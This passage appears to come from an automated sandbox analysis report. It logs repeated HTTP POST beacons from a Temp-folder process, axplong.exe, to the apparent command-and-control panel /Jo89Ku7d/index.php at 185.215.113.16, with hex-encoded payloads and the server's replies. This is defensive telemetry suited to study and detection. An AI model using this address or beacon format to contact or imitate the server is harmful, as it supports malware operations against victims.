                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:15.804568052 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.649732185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:15.926969051 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:16.653939962 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:16.654900074 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:16.881238937 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.649733185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:17.004812002 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:17.728404999 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:17.729402065 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:17.971012115 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.649734185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:18.086746931 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:18.797792912 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:18.806365013 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:19.049438000 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.649735185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:19.174683094 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:19.901345968 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:19.902298927 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:20.134442091 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.649736185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:20.278815031 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:21.052167892 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:21.053067923 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:21.290230036 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.649737185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:21.432295084 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:22.162587881 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:22.163767099 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:22.435724974 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.649738185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:22.555008888 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:23.290199995 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:23.296442986 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:23.525418997 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.649739185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:23.673394918 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:24.420269012 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:24.536663055 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:24.802232981 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.649740185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:24.933429956 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:25.663999081 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:25.664874077 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:25.897031069 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.649741185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:26.021989107 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:26.732294083 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:26.733172894 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:26.962781906 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.649742185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:27.081470966 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:27.803015947 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:27.804039001 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:28.034357071 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.649743185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:28.145132065 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:28.856002092 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:28.857063055 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
